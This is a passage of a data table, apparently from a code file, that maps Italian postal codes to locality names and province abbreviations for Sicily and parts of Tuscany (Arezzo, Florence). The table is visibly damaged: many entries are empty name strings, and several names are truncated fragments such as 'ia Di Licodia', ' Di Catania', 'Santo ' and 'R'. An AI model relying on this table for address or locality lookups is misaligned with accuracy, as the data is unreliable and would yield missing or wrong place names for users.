["Canalicchio", "CT"], ["", "CT"], ], "95031": [["Adrano", "CT"]], "95032": [ ["Belpasso", "CT"], ["", "CT"], ["", "CT"], ["", "CT"], ["", "CT"], ["Palazzolo", "CT"], ], "95033": [["Biancavilla", "CT"]], "95034": [["Bronte", "CT"]], "95035": [["Maletto", "CT"]], "95036": [["Randazzo", "CT"], ["Calderara", "CT"]], "95037": [["San Giovanni La Punta", "CT"], ["Trappeto", "CT"]], "95038": [["ia Di Licodia", "CT"]], "95039": [["Trecastagni", "CT"]], "95040": [ ["", "CT"], ["", "CT"], ["Libertinia", "CT"], ["", "CT"], ["Giumarra", "CT"], ["Mazzarrone", "CT"], ["", "CT"], ["", "CT"], ["Raddusa", "CT"], ["Cinquegrana", "CT"], ["", "CT"], ["", "CT"], ["Ramacca", "CT"], ["Carrubbo", "CT"], ], "95041": [ ["", "CT"], ["Caltagirone", "CT"], ["Granieri", "CT"], ["", "CT"], ], "95042": [["Grammichele", "CT"]], "95043": [[" Di Catania", "CT"]], "95044": [["", "CT"], ["Mineo", "CT"]], "95045": [["Misterbianco", "CT"], ["", "CT"]], "95046": [["Palagonia", "CT"]], "95047": [["Paterno'", "CT"], ["Sferro", "CT"]], "95048": [["Scordia", "CT"]], "95049": [["Vizzini", "CT"]], "95100": [["Catania", "CT"]], "95121": [ ["Catania", "CT"], ["", "CT"], ["San Teodoro", "CT"], ["San Giorgio", "CT"], ["San Giuseppe All", "CT"], ["", "CT"], ["", "CT"], ], "95122": [["Nesima Inferiore", "CT"], ["Acquicella", "CT"], ["Nesima Superiore", "CT"], ["Catania", "CT"]], "95123": [["Catania", "CT"], ["San Nullo", "CT"], ["Cibali", "CT"]], "95124": [["Catania", "CT"]], "95125": [["Catania", "CT"], ["Canalicchio", "CT"], ["Barriera Del Bosco", "CT"]], "95126": [["Ognina", "CT"], ["Catania", "CT"]], "95127": [["Catania", "CT"], ["Picanello", "CT"]], "95128": [["Catania", "CT"]], "95129": [["Catania", "CT"]], "95131": [["Catania", "CT"]], "94010": [ ["", "EN"], ["Assoro", "EN"], ["Nissoria", "EN"], ["Calascibetta", "EN"], ["Cacchiamo", "EN"], ["", "EN"], ["", "EN"], ["Sperlinga", "EN"], ["Cerami", "EN"], ["Centuripe", "EN"], ["Villarosa", "EN"], ["Catenanuova", "EN"], ["Villapriolo", "EN"], ["Aidone", "EN"], ], "94011": [["Agira", "EN"]], "94012": [["Barrafranca", "EN"]], "94013": [["Leonforte", "EN"]], "94014": [["Nicosia", "EN"], ["Villadoro", "EN"], ["San Giacomo", "EN"]], "94015": [["Grottacalda", "EN"], ["", "EN"]], "94016": [["Pietraperzia", "EN"]], "94017": [["Regalbuto", "EN"]], "94018": [["Troina", "EN"]], "94019": [["", "EN"]], "94100": [["Enna", "EN"], ["Pergusa", "EN"], ["", "EN"]], "98020": [["Rocchenere", "ME"], ["Pagliara", "ME"], ["Mandanici", "ME"], ["Ali'", "ME"], ["Locadi", "ME"]], "98021": [["", "ME"]], "98022": [["Fiumedinisi", "ME"]], "98023": [["", "ME"]], "98025": [["Itala", "ME"], ["", "ME"]], "98026": [["", "ME"]], "98027": [["Sciglio", "ME"], ["Roccalumera", "ME"], ["Allume", "ME"]], "98028": [["Misserio", "ME"], ["", "ME"], ["Barracca", "ME"]], "98029": [ ["", "ME"], ["", "ME"], ["", "ME"], ["Guidomandri", "ME"], ], "98030": [ ["", "ME"], ["Floresta", "ME"], ["", "ME"], ["Gallodoro", "ME"], ["Roccafiorita", "ME"], ["Mongiuffi", "ME"], ["Santa Dia", "ME"], ["'", "ME"], ["", "ME"], ["Limina", "ME"], ["Gaggi", "ME"], ["", "ME"], ["Castelmola", "ME"], ["", "ME"], ["", "ME"], ["Melia", "ME"], ["Antillo", "ME"], ["Malvagna", "ME"], ], "98031": [["Capizzi", "ME"]], "98032": [ ["Misitano", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ], "98033": [["Cesaro'", "ME"]], "98034": [["", "ME"]], "98035": [["Naxos", "ME"], ["", "ME"], ["Pallio", "ME"]], "98036": [["Graniti", "ME"]], "98037": [["Letojanni", "ME"]], "98038": [["Rina", "ME"], ["Savoca", "ME"]], "98039": [ ["Chianchitta", "ME"], ["Mazzeo", "ME"], ["Taormina", "ME"], ["Trappitello", "ME"], ["Mazzaro'", "ME"], ], "98040": [ ["Fondachello", "ME"], ["'", "ME"], ["Torregrotta", "ME"], ["Condro'", "ME"], ["Roccavaldina", "ME"], ["Venetico", "ME"], ["", "ME"], ["", "ME"], ["Valdina", "ME"], ["Soccorso", "ME"], ["", "ME"], ["Meri'", "ME"], ], "98041": [["", "ME"], ["Pellegrino", "ME"], ["", "ME"]], "98042": [["Giammoro", "ME"], ["", "ME"]], "98043": [["Rometta", "ME"], ["", "ME"], ["Gimello", "ME"], ["Sant'Andrea", "ME"]], "98044": [ ["", "ME"], ["Archi", "ME"], ["Cattafi", "ME"], ["Olivarella", "ME"], ["Corriolo", "ME"], ], "98045": [["", "ME"], ["", "ME"]], "98046": [["", "ME"]], "98047": [["", "ME"], ["Saponara", "ME"], ["Cavaliere", "ME"], ["Scarcelli", "ME"]], "98048": [["Spadafora", "ME"], ["San Mart", "ME"], ["", "ME"]], "98049": [["", "ME"], ["Divieto", "ME"], ["Calvaruso", "ME"], ["Serro", "ME"]], "98050": [ ["Filicudi", "ME"], ["", "ME"], ["Panarea", "ME"], ["Alicudi", "ME"], ["Rubino", "ME"], ["", "ME"], ["Malfa", "ME"], ["Vulcano", "ME"], ["", "ME"], ["Vigliatore", "ME"], ["", "ME"], ["Lingua", "ME"], ["Ginostra", "ME"], ["Fantina", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ["Leni", "ME"], ["Stromboli", "ME"], ["Evangelisti", "ME"], ["", "ME"], ], "98051": [ ["", "ME"], ["", "ME"], ["La Gala", "ME"], ["", "ME"], ["Caldera'", "ME"], ["Sant'Antonio", "ME"], ["", "ME"], ["", "ME"], ["Cannistra'", "ME"], ["Gala", "ME"], ["Acquaficara", "ME"], ], "98053": [["Bafia", "ME"], ["Castroreale", "ME"], ["Protonotaro", "ME"]], "98054": [["Furnari", "ME"], ["Tonnarella", "ME"]], "98055": [ ["", "ME"], ["Lipari", "ME"], ["Acquacalda", "ME"], ["Canneto", "ME"], ["Pianoconte", "ME"], ["Quattropani", "ME"], ], "98056": [["", "ME"]], "98057": [["", "ME"], ["Milazzo", "ME"], ["San Pietro Di Milazzo", "ME"]], "98058": [["", "ME"], ["", "ME"]], "98059": [["", "ME"], ["Milici", "ME"]], "98060": [ ["Tripi", "ME"], ["Salina'", "ME"], ["Belvedere", "ME"], ["", "ME"], ["Montagnareale", "ME"], ["Piraino", "ME"], ["", "ME"], ["Falcone", "ME"], ["Basico'", "ME"], ["", "ME"], ["Gliaca", "ME"], ["Oliveri", "ME"], ["", "ME"], ["Campogrande", "ME"], ["", "ME"], ["Ucria", "ME"], ["", "ME"], ], "98061": [["Brolo", "ME"]], "98062": [["Ficarra", "ME"]], "98063": [["Magaro", "ME"], ["", "ME"], ["", "ME"]], "98064": [["Nasidi", "ME"], ["Librizzi", "ME"], ["", "ME"]], "98065": [["", "ME"], ["", "ME"], ["Braidi", "ME"]], "98066": [ ["Scala", "ME"], ["Mongiove", "ME"], ["Tindari", "ME"], ["Patti", "ME"], ["", "ME"], ["", "ME"], ["", "ME"], ], "98067": [["Raccuja", "ME"], ["", "ME"], ["Zappa", "ME"]], "98068": [["", "ME"], ["Fiumara", "ME"], ["Tesoriero", "ME"]], "98069": [["Sinagra", "ME"]], "98070": [ ["", "ME"], ["", "ME"], ["", "ME"], ["Mirto", "ME"], ["Reitano", "ME"], ["Torrenova", "ME"], ["Frazzano'", "ME"], ["", "ME"], ["", "ME"], ["Acquedolci", "ME"], ["", "ME"], ["", "ME"], ["Pettineo", "ME"], ["", "ME"], ["Castell'Umberto", "ME"], ["", "ME"], ["", "ME"], ["Sfaranda", "ME"], ["Longi", "ME"], ["Torremuzza", "ME"], ], "98071": [["", "ME"], ["Scafa", "ME"], ["", "ME"]], "98072": [["", "ME"], ["", "ME"], ["Caronia", "ME"]], "98073": [["Mistretta", "ME"]], "98074": [["Malo'", "ME"], ["Cresta", "ME"], ["Naso", "ME"]], "98075": [["", "ME"]], "98076": [["", "ME"], ["Vallebruca", "ME"], ["Torrecandele", "ME"]], "98077": [["", "ME"]], "98078": [ ["Moira", "ME"], ["Tortorici", "ME"], ["Sceti", "ME"], ["Grazia", "ME"], ["Ilombati", "ME"], ["", "ME"], ], "98079": [["", "ME"], ["Tusa", "ME"]], "98100": [["Messina", "ME"]], "98121": [["Messina", "ME"]], "98122": [["Messina", "ME"]], "98123": [["Messina", "ME"]], "98124": [["Messina", "ME"], ["Gazzi", "ME"]], "98125": [["Contesse", "ME"], ["Messina", "ME"]], "98126": [["Messina", "ME"], ["Santa Lucia Sopra Contesse", "ME"]], "98127": [["Zafferia", "ME"], ["Messina", "ME"]], "98128": [["Messina", "ME"], ["Tremestieri", "ME"]], "98129": [["Larderia", "ME"], ["Messina", "ME"]], "98131": [["Messina", "ME"], ["", "ME"]], "98132": [["", "ME"], ["", "ME"], ["Messina", "ME"]], "98133": [["Messina", "ME"], ["", "ME"]], "98134": [["Messina", "ME"], ["", "ME"]], "98135": [["Messina", "ME"], ["Santo ", "ME"], ["", "ME"]], "98136": [["", "ME"], ["Messina", "ME"]], "98137": [["", "ME"], ["Messina", "ME"]], "98138": [["Messina", "ME"], ["Pezzolo", "ME"]], "98139": [["San Placido Calonero'", "ME"], ["", "ME"], ["Briga", "ME"], ["Messina", "ME"]], "98141": [["Messina", "ME"], ["", "ME"]], "98142": [["Giampilieri", "ME"], ["San Filippo Inferiore", "ME"], ["Messina", "ME"]], "98143": [["Messina", "ME"], ["Altolia", "ME"], ["Molino", "ME"]], "98144": [["Messina", "ME"], ["o", "ME"]], "98145": [["Messina", "ME"], ["Bordonaro", "ME"], ["San Filippo", "ME"]], "98146": [["Cumia", "ME"], ["Santo", "ME"], ["Messina", "ME"]], "98147": [["Messina", "ME"], ["", "ME"]], "98148": [["Santo", "ME"], ["Messina", "ME"]], "98149": [["Messina", "ME"], ["Camaro", "ME"], ["", "ME"], ["Cataratti", "ME"]], "98151": [["Camaro", "ME"], ["Messina", "ME"]], "98152": [["Messina", "ME"], ["", "ME"], ["San Michele", "ME"]], "98153": [["Gesso", "ME"], ["Messina", "ME"]], "98154": [["Messina", "ME"], ["", "ME"], ["Salice", "ME"]], "98155": [["Castanea", "ME"], ["", "ME"], ["Messina", "ME"]], "98156": [["", "ME"], ["Messina", "ME"]], "98157": [["Messina", "ME"], ["", "ME"], ["", "ME"]], "98158": [["", "ME"], ["Messina", "ME"]], "98159": [["Messina", "ME"], ["", "ME"]], "98161": [["Messina", "ME"], ["Rodia", "ME"]], "98162": [["", "ME"], ["Messina", "ME"]], "98163": [["Messina", "ME"], ["Sparta'", "ME"]], "98164": [["", "ME"], ["Messina", "ME"], ["", "ME"]], "98165": [["Messina", "ME"], ["Ganzirri", "ME"]], "98166": [["Sant'Agata", "ME"], ["Messina", "ME"]], "98167": [["Messina", "ME"], ["Pace", "ME"]], "98168": [ ["", "ME"], ["Contemplazione", "ME"], ["Pace", "ME"], ["Villaggio Paradiso", "ME"], ["Messina", "ME"], ], "90010": [ ["", "PA"], ["Ustica", "PA"], ["Cerda", "PA"], ["Finale", "PA"], ["Gratteri", "PA"], ["Pollina", "PA"], ["Isnello", "PA"], ["", "PA"], ["", "PA"], ["Lascari", "PA"], ["Ficarazzi", "PA"], ["", "PA"], ["", "PA"], ["", "PA"], ["", "PA"], ], "90011": [["Aspra", "PA"], ["Bagheria", "PA"]], "90012": [["Sambuchi", "PA"], ["", "PA"], ["Caccamo", "PA"]], "90013": [["Castelbuono", "PA"]], "90014": [["Casteldaccia", "PA"]], "90015": [["Gibilmanna", "PA"], ["Sant'Ambrogio", "PA"], ["Cefalu'", "PA"]], "90016": [["Collesano", "PA"]], "90017": [["Sant'Elia", "PA"], ["Santa Flavia", "PA"], ["Porticello", "PA"]], "90018": [["Termini Imerese", "PA"], ["Danigarci", "PA"]], "90019": [["San Nicolo' L'Arena", "PA"], ["Trabia", "PA"]], "90020": [ ["Scillato", "PA"], ["Vicari", "PA"], ["Ventimiglia Di Sicilia", "PA"], ["Sciara", "PA"], ["Calcarelli", "PA"], ["Roccapalumba", "PA"], ["Baucina", "PA"], ["Blufi", "PA"], ["Alimena", "PA"], ["", "PA"], ["Nociazzi Inferiore", "PA"], ["Aliminusa", "PA"], ["Regalgioffoli", "PA"], ["", "PA"], ["", "PA"], ["Bompietro", "PA"], ["Nociazzi", "PA"], ["Locati", "PA"], ], "90021": [["Alia", "PA"]], "90022": [["Caltavuturo", "PA"]], "90023": [["Ciminna", "PA"]], "90024": [["Gangi", "PA"]], "90025": [["", "PA"]], "90026": [ ["Pianello", "PA"], ["Pianello Di Petralia Sottana", "PA"], ["Raffo", "PA"], ["Petralia Soprana", "PA"], ["Fasano'", "PA"], ], "90027": [["Petralia Sottana", "PA"]], "90028": [["Polizzi Generosa", "PA"]], "90029": [["Valledolmo", "PA"]], "90030": [ ["", "PA"], ["Godrano", "PA"], ["Blandino", "PA"], ["", "PA"], ["Campofiorito", "PA"], ["Giuliana", "PA"], ["", "PA"], ["Contessa Entellina", "PA"], ["Castronuovo Di Sicilia", "PA"], ["Mezzojuso", "PA"], ["Villafrati", "PA"], ["", "PA"], ["Altofonte", "PA"], ["Bolognetta", "PA"], ["", "PA"], ], "90031": [["", "PA"]], "90032": [["Bisacquino", "PA"]], "90033": [["", "PA"], ["", "PA"]], "90034": [["Corleone", "PA"], ["Ficuzza", "PA"]], "90035": [["Marineo", "PA"]], "90036": [["", "PA"], ["Misilmeri", "PA"]], "90037": [["", "PA"]], "90038": [["Filaga", "PA"], ["Prizzi", "PA"]], "90039": [["Villabate", "PA"]], "90040": [ ["Montelepre", "PA"], ["Giardinello", "PA"], ["Trappeto", "PA"], ["Roccamena", "PA"], ["San Cipirello", "PA"], ["Grisi'", "PA"], ["", "PA"], ["Capaci", "PA"], ["Torretta", "PA"], ["Cortiglia", "PA"], ], "90041": [["Balestrate", "PA"], ["Foce", "PA"]], "90042": [["Borgetto", "PA"]], "90043": [["Camporeale", "PA"]], "90044": [["", "PA"], ["Carini", "PA"]], "90045": [["Cinisi", "PA"], ["Punta Raisi Aeroporto", "PA"]], "90046": [ ["", "PA"], ["", "PA"], ["Pioppo", "PA"], ["San Martino Delle Scale", "PA"], ["Malpasso", "PA"], ["Monreale", "PA"], ], "90047": [["Partinico", "PA"]], "90048": [["", "PA"]], "90049": [["Terrasini", "PA"], ["Citta' Del Mare", "PA"]], "90100": [["Palermo", "PA"]], "90121": [ ["Palermo", "PA"], ["Boccadifalco", "PA"], ["In Via Messina Marine", "PA"], ["In Via Ammiraglio Cristodulo", "PA"], ["Brancaccio Ciaculli", "PA"], ["Acqua ", "PA"], ], "90122": [["", "PA"], ["Palermo", "PA"]], "90123": [["Palermo", "PA"], ["Settecannoli", "PA"]], "90124": [ ["In Via Chiavelli", "PA"], ["Brancaccio Ciaculli", "PA"], ["In Via Brancaccio", "PA"], ["In Via Santa Maria '", "PA"], ["Palermo", "PA"], ], "90125": [["Palermo", "PA"], ["In Via Aloi", "PA"]], "90126": [["", "PA"], ["Palermo", "PA"]], "90127": [["Palermo", "PA"]], "90128": [["Palermo", "PA"]], "90129": [["Palermo", "PA"]], "90131": [["Palermo", "PA"], ["R", "PA"]], "90132": [["Palermo", "PA"]], "90133": [["Palermo", "PA"], ["Tribunali Castellammare", "PA"]], "90134": [["Zisa", "PA"], ["In Via Gioiamia", "PA"], ["Palermo", "PA"]], "90135": [["Palermo", "PA"], ["Zisa", "PA"]], "90136": [["Palermo", "PA"]], "90137": [["Palermo", "PA"]], "90138": [["Palermo", "PA"], ["Zisa", "PA"]], "90139": [["Palermo", "PA"]], "90141": [["Palermo", "PA"]], "90142": [["Palermo", "PA"], ["Montepellegrino", "PA"], ["", "PA"]], "90143": [["Palermo", "PA"]], "90144": [["Palermo", "PA"]], "90145": [["Palermo", "PA"]], "90146": [ ["Palermo", "PA"], ["In Via San Nicola", "PA"], ["Pallavicino", "PA"], ["Cruillas", "PA"], ["", "PA"], ["", "PA"], ], "90147": [["", "PA"], ["Palermo", "PA"]], "90148": [["Palermo", "PA"], ["Sferracavallo", "PA"], ["Villagrazia", "PA"], ["", "PA"]], "90149": [["Palermo", "PA"]], "90151": [["Palermo", "PA"], ["", "PA"], ["Mondello", "PA"]], "97010": [ ["", "RG"], ["Bellocozzo", "RG"], ["", "RG"], ["", "RG"], ["Roccazzo", "RG"], ["Giarratana", "RG"], ], "97011": [["Acate", "RG"]], "97012": [["", "RG"]], "97013": [["Pedalino", "RG"], ["Comiso", "RG"]], "97014": [["Ispica", "RG"]], "97015": [ ["", "RG"], ["Frigintini", "RG"], ["", "RG"], ["", "RG"], ["Modica", "RG"], ], "97016": [["Pozzallo", "RG"]], "97017": [["Santa Croce Camerina", "RG"], ["Donnafugata", "RG"]], "97018": [["Donnalucata", "RG"], ["Jungi", "RG"], ["", "RG"], ["Scicli", "RG"], ["Sampieri", "RG"]], "97019": [["Scoglitti", "RG"], ["Vittoria", "RG"]], "97100": [["Ragusa", "RG"], ["", "RG"]], "96010": [ ["", "SR"], ["Melilli", "SR"], ["Buccheri", "SR"], ["Villasmundo", "SR"], ["Sortino", "SR"], ["Ferla", "SR"], ["", "SR"], ["'", "SR"], ["", "SR"], ["Cassaro", "SR"], ["Buscemi", "SR"], ["Rizzolo", "SR"], ["Solarino", "SR"], ["", "SR"], ["", "SR"], ], "96011": [["Augusta", "SR"], ["Brucoli", "SR"]], "96012": [["Avola", "SR"]], "96013": [["", "SR"], ["Carlentini", "SR"], ["Pedagaggi", "SR"]], "96014": [["Floridia", "SR"]], "96015": [["Francofonte", "SR"]], "96016": [["Lentini", "SR"]], "96017": [ ["", "SR"], ["", "SR"], ["San Paolo", "SR"], ["", "SR"], ["Noto", "SR"], ["Santa Lucia Di Noto", "SR"], ["", "SR"], ["Rigolizia", "SR"], ["Castelluccio", "SR"], ], "96018": [["Marzamemi", "SR"], ["Pachino", "SR"]], "96019": [["Rosolini", "SR"]], "96100": [ ["Siracusa", "SR"], ["Carrozziere", "SR"], ["", "SR"], ["Belvedere", "SR"], ["Cassibile", "SR"], ], "91010": [ ["Castelluzzo", "TP"], ["Macari", "TP"], ["Vita", "TP"], ["Marettimo", "TP"], ["", "TP"], ], "91011": [["Alcamo", "TP"]], "91012": [["Bruca", "TP"], ["Battaglia", "TP"], ["", "TP"]], "91013": [["Sasi", "TP"], ["", "TP"], ["Calatafimi", "TP"]], "91014": [ ["Scopello", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ], "91015": [["", "TP"], ["Purgatorio", "TP"], ["Custonaci", "TP"]], "91016": [ ["Napola", "TP"], ["Ballata", "TP"], ["Pizzolungo", "TP"], ["", "TP"], ["", "TP"], ["Rigaletta", "TP"], ["Erice", "TP"], ], "91017": [ ["Kamma", "TP"], ["", "TP"], ["Scauri", "TP"], ["", "TP"], ["Pantelleria", "TP"], ], "91018": [["Ulmi", "TP"], ["Filci", "TP"], ["", "TP"], ["Salemi", "TP"], ["Gorgazzo", "TP"]], "91019": [ ["Valderice", "TP"], ["", "TP"], ["Chiesanuova", "TP"], ["Crocevie", "TP"], [" Bonagia", "TP"], ["Bonagia", "TP"], ["Crocci", "TP"], ["Fico", "TP"], ], "91020": [ ["Poggioreale", "TP"], ["Salaparuta", "TP"], ["Granitola", "TP"], ["", "TP"], ["Petrosino", "TP"], ], "91021": [["", "TP"], ["", "TP"], ["", "TP"]], "91022": [["Castelvetrano", "TP"], ["", "TP"], ["Marinella", "TP"], ["Triscina", "TP"]], "91023": [["Favignana", "TP"], ["Levanzo", "TP"]], "91024": [["Gibellina", "TP"], ["", "TP"]], "91025": [ ["Spagnola", "TP"], ["Marsala", "TP"], ["Ragattisi", "TP"], ["Matarocco", "TP"], ["Ciavolotto", "TP"], ["Bufalata", "TP"], ["Tabaccaro", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ["Paolini", "TP"], ["Ciavolo", "TP"], ], "91026": [["", "TP"], ["", "TP"]], "91027": [["Paceco", "TP"], ["Dattilo", "TP"], ["Nubia", "TP"]], "91028": [["Partanna", "TP"]], "91029": [["", "TP"]], "91100": [ ["Xitta", "TP"], ["", "TP"], ["Locogrande", "TP"], ["", "TP"], ["", "TP"], ["", "TP"], ["Marausa", "TP"], ["Ummari", "TP"], ["Fulgatore", "TP"], ["", "TP"], ["", "TP"], ["Trapani", "TP"], ["Guarrato", "TP"], ["Salinagrande", "TP"], ["Rilievo", "TP"], ], "52010": [ ["", "AR"], ["", "AR"], ["Biforco", "AR"], ["Subbiano", "AR"], ["Corsalone", "AR"], ["Ortignano", "AR"], ["", "AR"], ["", "AR"], ["Montemignaio", "AR"], ["Faltona", "AR"], ["Capolona", "AR"], ["Chitignano", "AR"], ["Talla", "AR"], ["", "AR"], ["Raggiolo", "AR"], ["", "AR"], ], "52011": [ ["Bibbiena", "AR"], ["Soci", "AR"], ["Partina", "AR"], ["Banzena", "AR"], ["Bibbiena Stazione", "AR"], ["Serravalle", "AR"], ], "52014": [ ["", "AR"], ["Avena", "AR"], ["Quota", "AR"], ["Camaldoli", "AR"], ["Poppi", "AR"], ["Porrena", "AR"], ["", "AR"], ["Moggiona", "AR"], ], "52015": [["Pratovecchio", "AR"], ["Pratovecchio Stia", "AR"]], "52016": [["", "AR"], ["Rassina", "AR"], ["Salutio", "AR"], ["", "AR"]], "52017": [["Papiano", "AR"], ["Stia", "AR"]], "52018": [["", "AR"], ["Strada", "AR"], ["'", "AR"]], "52020": [ ["", "AR"], ["Laterina", "AR"], ["Ponticino", "AR"], ["", "AR"], ["Montalto", "AR"], ["", "AR"], ["", "AR"], ["Cavi", "AR"], ["Casalone", "AR"], ], "52021": [ ["Torre", "AR"], ["", "AR"], ["Capannole", "AR"], ["Ambra", "AR"], ["Bucine", "AR"], ["Pietraviva", "AR"], ], "52022": [ ["Meleto", "AR"], ["Cavriglia", "AR"], ["", "AR"], ["Neri", "AR"], ["Vacchereccia", "AR"], ["Santa Barbara", "AR"], ["Monastero", "AR"], ["", "AR"], ["Montegonzi", "AR"], ], "52024": [["", "AR"], ["", "AR"]], "52025": [["Levane", "AR"], ["Montevarchi", "AR"], ["Moncioni", "AR"], ["", "AR"]], "52026": [["", "AR"], ["", "AR"], ["Vaggio", "AR"], ["Faella", "AR"]], "52027": [["", "AR"]], "52028": [ ["Penna", "AR"], ["Madrigale", "AR"], ["", "AR"], ["Ville", "AR"], ["Campogialli", "AR"], ["Malva", "AR"], ], "52029": [["", "AR"]], "52031": [["", "AR"], ["Anghiari", "AR"]], "52032": [["", "AR"], ["", "AR"], ["Fresciano", "AR"]], "52033": [["", "AR"]], "52035": [["Le Ville", "AR"], ["Monterchi", "AR"]], "52036": [["Madonnuccia", "AR"], ["", "AR"]], "52037": [["Gricignano", "AR"], ["", "AR"], ["Sansepolcro", "AR"]], "52038": [["Colcellalto", "AR"], ["Sestino", "AR"], ["Monterone", "AR"]], "52041": [ ["", "AR"], ["Viciomaggio", "AR"], ["Ciggiano", "AR"], ["", "AR"], ["Tegoleto", "AR"], ["", "AR"], ], "52043": [["", "AR"], ["Montecchio", "AR"], ["Manciano", "AR"]], "52044": [ ["", "AR"], ["Cortona", "AR"], ["Mercatale", "AR"], ["Santa Caterina", "AR"], ["Santa Caterina Di Cortona", "AR"], ["Fratta", "AR"], ["Centoia", "AR"], ["", "AR"], ["Capezzine", "AR"], ["Montanare", "AR"], ["", "AR"], ["Camucia", "AR"], ["", "AR"], ["Terontola", "AR"], ], "52045": [["", "AR"], ["", "AR"]], "52046": [["Lucignano", "AR"]], "52047": [["Marciano", "AR"], ["Cesa", "AR"], ["", "AR"]], "52048": [ ["Montagnano", "AR"], ["", "AR"], ["", "AR"], ["Palazzuolo", "AR"], ["Alberoro", "AR"], ], "52100": [ ["Patrignone", "AR"], ["Chiassa", "AR"], ["", "AR"], ["", "AR"], ["", "AR"], ["", "AR"], ["Olmo", "AR"], ["", "AR"], ["Indicatore", "AR"], ["Battifolle", "AR"], ["", "AR"], ["Frassineto", "AR"], ["Rigutino", "AR"], ["Pratantico", "AR"], ["Quarata", "AR"], ["Ruscello", "AR"], ["Poggiola", "AR"], ["Arezzo", "AR"], ["", "AR"], ["Ceciliano", "AR"], ["Antria", "AR"], ["Staggiano", "AR"], ["Puglia", "AR"], ["Tregozzano", "AR"], ], "50010": [["Trespiano", "FI"]], "50012": [ ["Vallina", "FI"], ["", "FI"], ["Grassina Pont", "FI"], ["Osteria Nuova", "FI"], ["Candeli", "FI"], ["Grassina", "FI"], ["Antella", "FI"], ["Rimaggio", "FI"], ], "50013": [ ["San Piero A Ponti", "FI"], ["Il Rosi", "FI"], ["San Donnino Di Campi", "FI"], ["Capalle", "FI"], ["Sant'Angelo", "FI"], ["San Donnino", "FI"], ["", "FI"], ["", "FI"], ], "50014": [["Caldine", "FI"], ["", "FI"], ["Fiesole", "FI"], ["", "FI"]], "50018": [ ["", "FI"], ["Casellina", "FI"], ["", "FI"], ["Scandicci", "FI"], ["", "FI"], ["Le Bagnese San Giusto", "FI"], ], "50019": [ ["Querceto", "FI"], ["Quinto", "FI"], ["Osmannoro", "FI"], ["", "FI"], ["Colonnata", "FI"], ["", "FI"], ], "50020": [["", "FI"]], "50021": [["", "FI"], ["Marcialla", "FI"]], "50022": [ ["Lamole", "FI"], ["Panzano", "FI"], ["San Polo In Chianti", "FI"], ["Lucolena", "FI"], ["Greve In Chianti", "FI"], ], "50023": [ ["Tavarnuzze", "FI"], ["", "FI"], ["Impruneta", "FI"], ["Pozzolatico", "FI"], ["Bottai", "FI"], ], "50025": [ ["San Quirico In Collina", "FI"], ["Lucardo", "FI"], ["Montespertoli", "FI"], ["Martignana", "FI"], ["Baccaiano", "FI"], ["Montagnana Val Di Pesa", "FI"], ], "50026": [ ["San Casciano In Val Di Pesa", "FI"], ["", "FI"], ["Cerbaia", "FI"], ["Mercatale", "FI"], ["Romola", "FI"], ["Montefiridolfi", "FI"], ["Spedaletto", "FI"], ], "50027": [["Chiocchio", "FI"], ["Strada In Chianti", "FI"], ["Passo Dei Pecorai", "FI"]], "50028": [ ["San Donato In Poggio", "FI"], ["Barberino Val D'Elsa", "FI"], ["Sambuca Val Di Pesa", "FI"], ["Tavarnelle Val Di Pesa", "FI"], ["Sambuca", "FI"], ], "50031": [ ["Cavallina", "FI"], ["Cafaggiolo", "FI"], ["Galliano", "FI"], ["", "FI"], ["", "FI"], ["Montecarelli", "FI"], ], "50032": [ ["", "FI"], ["", "FI"], ["Ronta", "FI"], ["Panicaglia", "FI"], ["Polcanto", "FI"], ], "50033": [ ["Bruscoli", "FI"], ["Rifredo", "FI"], ["Filigare", "FI"], ["Traversa", "FI"], ["Pietramala", "FI"], ["Coniale", "FI"], ["Cornacchiaia", "FI"], ["Firenzuola", "FI"], ["Covigliaio", "FI"], ["Piancaldoli", "FI"], ], "50034": [["Crespino Del Lamone", "FI"], ["Casaglia", "FI"], ["Lutirano", "FI"], ["Marradi", "FI"]], "50035": [["Misileo", "FI"], ["Palazzuolo Sul Senio", "FI"]], "50036": [["Bivigliano", "FI"], ["Pratolino", "FI"], ["Vaglia", "FI"], ["Fontebuona", "FI"]], "50037": [["San Piero A Sieve", "FI"]], "50038": [ ["Sant'Agata Mugello", "FI"], ["Scarperia", "FI"], ["Sant'Agata", "FI"], ["Scarperia E San Piero", "FI"], ], "50039": [["Cistio", "FI"], ["Rupecanina", "FI"], ["Villore", "FI"], ["Gattaia", "FI"], ["Vicchio", "FI"]], "50041": [ ["Calenzano", "FI"], ["Carraia", "FI"], ["Le Croci", "FI"], ["", "FI"], ["Settimello", "FI"], ], "50050": [ ["Capraia", "FI"], ["Stabbia", "FI"], ["Montaione", "FI"], ["", "FI"], ["Il Castagno Val D'Elsa", "FI"], ["Varna", "FI"], ["Limite Sull'Arno", "FI"], ["Il Castagno", "FI"], ["Ponte Di Masino", "FI"], ["Bassa", "FI"], ["", "FI"], ["", "FI"], ["", "FI"], ["Lazzeretto", "FI"], ["", "FI"], ["", "FI"], ["Gavena", "FI"], ], "50051": [ ["Dogana", "FI"], ["Petrazzi", "FI"], ["", "FI"], ["Cambiano", "FI"], ["Castelfiorentino", "FI"], ["Granaiolo", "FI"], ], "50052": [["Fiano", "FI"], ["Certaldo", "FI"]], "50053": [ ["Empoli", "FI"], ["Brusciana", "FI"], ["Fontanella", "FI"], ["Sant'Andrea", "FI"], ["", "FI"], ["", "FI"], ["Monterappoli", "FI"], ["", "FI"], ["Marcignana", "FI"], ], "50054": [ ["", "FI"], ["Galleno", "FI"], ["Torre", "FI"], ["", "FI"], ["Massarella", "FI"], ["Le Botteghe", "FI"], ["Fucecchio", "FI"], ["", "FI"], ["Querce", "FI"], ], "50055": [ ["", "FI"], ["Lastra A Signa", "FI"], ["Malmantile", "FI"], ["", "FI"], ["Brucianesi", "FI"], ["", "FI"], ], "50056": [ ["Ambrogiana", "FI"], ["Sammontana", "FI"], ["Samminiatello", "FI"], ["Fibbiana", "FI"], ["", "FI"], ], "50058": [["Signa", "FI"], ["San Mauro", "FI"], ["San Mauro A Signa", "FI"]], "50059": [ ["Orbignano", "FI"], ["Sant'Amato", "FI"], ["Vitolini", "FI"], ["San Pantaleo", "FI"], ["Spicchio", "FI"], ["Sovigliana", "FI"], ["Vinci", "FI"], ], "50060": [ ["Consuma", "FI"], ["Londa", "FI"], ["Borselli", "FI"], ["San Godenzo", "FI"], ["Pelago", "FI"], 